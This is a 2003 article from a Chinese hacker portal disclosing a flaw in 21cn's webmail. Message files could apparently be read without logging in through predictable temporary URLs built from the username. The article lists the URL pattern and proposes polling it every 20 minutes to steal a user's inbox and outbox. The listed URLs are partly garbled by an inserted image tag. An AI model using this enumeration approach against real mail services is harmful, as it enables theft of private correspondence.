 |
  |
|
| 首页 | 技术文章 | 软件下载 | 博客 | 论坛 | 精品教程 | 黑客动画 | 视频资源 | 在线服务 | 黑客游戏 | | ||||
 |
|
|||||||
|
||||||||
|
|||||
| 21cn的邮件系统的大BUG | |||||
作者:寒风 文章来源:mir44 点击数: 更新时间:2003-6-11  |
|||||
|
我轻易地找到了21cn的邮件系统的大BUG。包括它的收费和免费系统!!用轻易的方法我就可以看任何21cn邮件用户信箱中的信件!!!!而且,这是一个根本系统漏洞。2 1cn难以短期内解决。21cn可能只能临时变变路径而已,问题难以短期解决。 我的办法是: 1:用户abc登陆后先后看了第1、2..封信。 2:如果此用户使用WEBMAIL的时间内或退出后30分钟内,在另外一台机器上IE地址栏内输入 http://webmail.21cn.net/tmp/a/abc src="http://rina.isforce.org/non/smilies/shot1.gif">cn_net/1/1/message.txt http://webmail.21cn.net/tmp/a/abc src="http://rina.isforce.org/non/smilies/shot1.gif">cn_net/1/2/message.txt ... 上面字符串中的 /a/ ,其中a是其用户名abc的首位字母。 无需登陆即可取得用户abc的第1、2...封信的原码,虽然有些内容是经过编码,但只要以扩展名为.eml另存到本地即可用OUTLOOK看到全部内容。这是个大漏洞,谁都可以轻易利用。而且举一个很简单的例子: 我想窃取abc的信,只要用户abc是21cn的用户,且可能会使用21cn的web方式收发信,那么我只要编写一个程序,每20分钟轮流访问一遍下列地址:看abc收件箱里的内容 http://webmail.21cn.net/tmp/a/abc src="http://rina.isforce.org/non/smilies/shot1.gif">cn_net/1/1/message.txt http://webmail.21cn.net/tmp/a/abc src="http://rina.isforce.org/non/smilies/shot1.gif">cn_net/1/2/message.txt ... http://webmail.21cn.net/tmp/a/abc src="http://rina.isforce.org/non/smilies/shot1.gif">cn_net/1/500/message.txt 看abc发件箱的内容 http://webmail.21cn.net/tmp/a/abc src="http://rina.isforce.org/non/smilies/shot1.gif">cn_net/2/1/message.txt http://webmail.21cn.net/tmp/a/abc src="http://rina.isforce.org/non/smilies/shot1.gif">cn_net/2/2/message.txt ... http://webmail.21cn.net/tmp/a/abc src="http://rina.isforce.org/non/smilies/shot1.gif">cn_net/2/500/message.txt 只要此程序一直运行,用户在WEB上的查看后的信件没有一封能够逃掉。 |
|||||
| 文章录入:IceRiver 责任编辑:IceRiver | |||||
| 【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】 | |||||
| 最新热点 | 最新推荐 | 相关文章 | ||
| 奇虎呼吁网民共同举证CNNIC中 奇虎称6大杀毒软件均报CNNIC 瑞星公司08月21日发布 每日计 CN域名激增有喜有忧 透过CNNIC报告看中国互联网使 瑞星公司07月21日发布 每日计 CNNIC回应网友质疑 称调查过 CN域名总数达615万个 全面超 “12321全国反垃圾邮件总动员 CN超越COM 中国已居世界国家 |
 网友评论:(只显示最新5条。评论内容只代表网友观点,与本站立场无关!) |
 |
|
| 关于我们 - 版权声明 - 帮助(?) - 广告服务 - 联系我们 - 友情链接 - 用户注册 - | Powered by ICE RIVER - STUDIO |
|
|
| » CnXHacker.CoM |  |
© CopyRight 2002-2006, CnXHacker.CoM™, Inc. All Rights Reserved. |
